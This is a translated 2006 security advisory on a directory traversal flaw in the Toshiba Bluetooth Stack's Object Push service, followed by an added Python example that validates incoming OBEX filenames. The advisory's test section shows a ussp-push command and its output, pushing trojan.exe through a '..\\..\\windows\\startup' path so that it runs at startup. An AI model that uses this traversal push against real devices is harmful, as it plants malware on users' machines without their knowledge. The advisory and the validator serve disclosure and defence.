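Toshiba Bluetooth Stack Object Push Service File Upload Directory Traversal Vulnerability

Published: 2006-01-13
Updated: 2006-01-13

Affected systems:
Toshiba Bluetooth Stack 4.x
Toshiba Bluetooth Stack 4.0.11 (for Dell)
Toshiba Bluetooth Stack 3.x
Description:
BUGTRAQ  ID: 16236

The Toshiba Bluetooth Stack is the Bluetooth stack for PCs provided by Toshiba; it supports the v1.2 specification.

The Object Push service of the Toshiba Bluetooth Stack contains a directory traversal vulnerability that allows a remote attacker to upload files to any writable directory.

If the user accepts the connection request prompt, they are asked to specify where the file should be saved. Regardless of the path the user specifies, the attacker can upload the file to any writable location. The filename is not shown during the connection, so the victim has no indication that an attack is taking place.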

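<*Source: Kevin Finisterre (dotslash@snosoft.com
  
  Link: http://www.digitalmunition.com/DMA%5B2006-0112a%5D.txt
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!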

animosity:/home/kfinisterre/ussp-push-0.5# ./ussp-push
00:11:B1:07:BE:A7@4 trojan.exe ..\\..\\..\\..\\..\\windows\\startup\\pwned.exe
pushing file trojan.exe
name=trojan.exe, size=18009
Registered transport

set user data

created new objext
Local device 00:0A:3A:54:71:95
Remote device 00:11:B1:07:BE:A7 (4)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ..\..\..\..\..\windows\startup\pwned.exe, path: trojan.exe, size: 18009
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!

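Recommendations:
Temporary workaround:

* Do not accept connection requests from untrusted sources.

Vendor patch:

Toshiba
-------
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: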

http://www.toshiba.com/
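
The receiver-side check whose absence the description above implies, as an added example that is not part of the original advisory or of Toshiba's code: it decodes the sender-supplied OBEX Name header and refuses any name that could resolve outside the folder the user chose. The function names, the reject-rather-than-strip policy and the sample folder are assumptions made for illustration.

```python
import ntpath
import struct

OBEX_HI_NAME = 0x01  # OBEX Name header: id byte, 2-byte length, UTF-16BE text + NUL

def decode_name_header(hdr: bytes) -> str:
    """Return the filename the sender put in an OBEX Name header."""
    if len(hdr) < 3 or hdr[0] != OBEX_HI_NAME:
        raise ValueError("not an OBEX Name header")
    (length,) = struct.unpack(">H", hdr[1:3])  # length includes the 3 prefix bytes
    if length != len(hdr) or (length - 3) % 2:
        raise ValueError("bad Name header length")
    return hdr[3:].decode("utf-16-be").rstrip("\x00")

def safe_target(save_dir: str, name: str) -> str:
    """Return the path to write, or raise ValueError if name could leave save_dir."""
    if not name.strip(". "):
        raise ValueError("empty or dot-only name")
    if any(c in '/\\:' or ord(c) < 0x20 for c in name):
        raise ValueError("separator, drive/stream marker or control character")
    root = ntpath.normpath(save_dir)
    target = ntpath.normpath(ntpath.join(root, name))
    # Second check: the normalised target must sit directly inside save_dir.
    if ntpath.dirname(target).lower() != root.lower():
        raise ValueError("target escapes the chosen directory")
    return target

def check_push(save_dir: str, hdr: bytes):
    """Receiver-side gate: target path for an accepted push, None for a rejected one."""
    try:
        return safe_target(save_dir, decode_name_header(hdr))
    except ValueError:
        return None

def make_name_header(name: str) -> bytes:
    """Build a Name header for the constructed samples below."""
    body = (name + "\x00").encode("utf-16-be")
    return bytes([OBEX_HI_NAME]) + struct.pack(">H", len(body) + 3) + body

if __name__ == "__main__":
    save_dir = r"C:\Users\alice\Downloads"  # hypothetical user-chosen folder
    # Constructed samples; the second is the name shown in the session above.
    for sample in ["photo.jpg", r"..\..\..\..\..\windows\startup\pwned.exe", "..", "C:x.exe"]:
        print(repr(sample), "->", check_push(save_dir, make_name_header(sample)))
```

Showing the decoded name in the acceptance prompt, before any data is written, also addresses the advisory's point that the user never sees the filename.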

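This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.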